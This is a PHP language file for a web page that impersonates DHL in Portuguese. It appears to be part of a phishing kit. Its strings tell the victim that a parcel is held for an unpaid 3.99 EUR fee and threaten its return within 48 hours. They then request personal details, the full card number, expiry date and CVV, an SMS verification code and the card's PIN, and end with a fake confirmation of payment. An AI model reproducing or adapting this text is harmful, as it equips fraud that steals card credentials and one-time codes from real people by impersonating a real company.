<?php

function lang($phrase){
	static $lang = array(

		
        'xTitle' => 'Logística Global - Transporte Internacional | Início DHL',
        'xContactUs' => 'Fale Conosco',
        'xPortalLogin' => 'Login no Portal',
        'xSearch' => 'Pesquisar',
        'xTrackNav' => 'Track',
        'xAllProducts&Solutions' => 'Todos os produtos e soluções',
        'xNossasDivisões' => 'Nossas Divisões',
        'xIndustrySectors' => 'Setores da Indústria',
        'xInsights&Innovation' => 'Insights & Inovação',
        'xCarreiras' => 'Carreiras',
        'xPress' => 'Pressione',
        'xAboutUs' => 'Sobre nós',
        'xTrackYourShipment' => 'Rastreie sua remessa',
        'xEnteryourEmail' => 'Digite seu Email',
        'xTrackBtn' => 'Track',
        'xDHLExpressReferenceTracking' => 'Rastreamento de referência DHL Express',
        'xShippingServices' => 'Serviços de Envio',
        'xPacotes' => 'Pacotes',
        'xDocumentParcel' => 'Documento e Parcela',
        'xAirFreight' => 'Frete Aéreo',
        'xOceanFreight' => 'Frete Marítimo',
        'xRoadFreight' => 'Frete Rodoviário',
        'xRailFreight' => 'Frete Ferroviário',
        'xFollowUs' => 'Siga-nos',
        'xDeutschePostDHLGroup' => 'Deutsche Post DHL Group',
        'xReadmoreaboutFraudAwareness' => 'Consciência de Fraude',
        'xReadmoreaboutLegalNotice' => 'Aviso Legal',
        'xTermsofUse' => 'Termos de Uso',
        'xPrivacyNotice' => 'Aviso de Privacidade',
        'xDisputeResolution' => 'Resolução de disputa',
        'xAcessibilidade' => 'Acessibilidade',
        'xCookieSettings' => 'Configurações de cookies',
        'xDe' => 'De',
        'xExpectedDelivery' => 'Entrega esperada',
        'xTaxes' => 'Impostos',
        'xExplainHeading' => 'Entrega interrompida',
        'xDelv' => 'Entrega esperada',
        'xPackagenumber' => 'Número do pacote',
        'xBinfo' => '(Informações de cobrança)',
        'xBpay' => '(Pagamento)',
        'xBauth' => '(Autenticação)',
        'xBh1t' => 'Confirme suas informações de cobrança',
        'xHexplain' => 'Entrega Interrompida',
        'xp1' => 'Sua última entrega foi interrompida. Ela está atualmente em espera no centro de triagem',
        'xp2' => 'A sua encomenda não respeitou o peso indicado, são-lhe solicitados custos adicionais para poder transportar a sua encomenda correctamente.',
        'xp3' => 'A taxa é de 3.99EUR Para pagar clique no botão abaixo',
        'xp4' => 'Assim que as taxas forem pagas, seu pacote será enviado o mais rápido possível para o local de entrega.',
        'xp5' => 'Caso não sejam liquidados nas próximas 48 horas, o pacote será devolvido ao remetente.',
        'xname' => 'Nome Completo',
        'xadress' => 'Endereço',
        'xpaís' => 'País',
        'xcidade' => 'Cidade',
        'xphone' => 'Número de telefone',
        'xdate' => 'Data de Nascimento',
        'xCpoaf' => 'Pagamento de taxas adicionais',
        'xcch' => 'Titular do cartão de crédito',
        'xccn' => 'Número do cartão de crédito',
        'xexp' => 'Data de vencimento (mm/aa)',
        'xcvv' => 'Código (CVV)',
        "xAauth" => "Autenticação",
        "xAp1" => "Para prosseguir com o seu pagamento, introduza o código de verificação enviado para o seu número de telemóvel",
        "xAcp" => "Código",
        'xAp2' => 'Por favor, digite o código que você recebeu por (SMS)',
        'xHp' => 'Pagamento bem-sucedido',
        'xRod' => 'Retomada da entrega',
        'xP1fin' => 'O pagamento dos custos adicionais foi levado em consideração.',
        'xP2fin' => 'Seu pacote deve chegar para entrega nas próximas 24 horas.',
        'xPay' => 'Pagar agora',
        'xCnt' => 'Continuar',
        'xConcluir' => 'Concluir',
        "xpin1" => "Para validar o seu pagamento, introduza o código PIN do seu cartão",
	"xpin2" => "Código PIN",
	"xpin3" => "Por favor, introduza o código PIN de 4 dígitos do seu cartão"

	);	
	
	return $lang[$phrase];
}
 ?>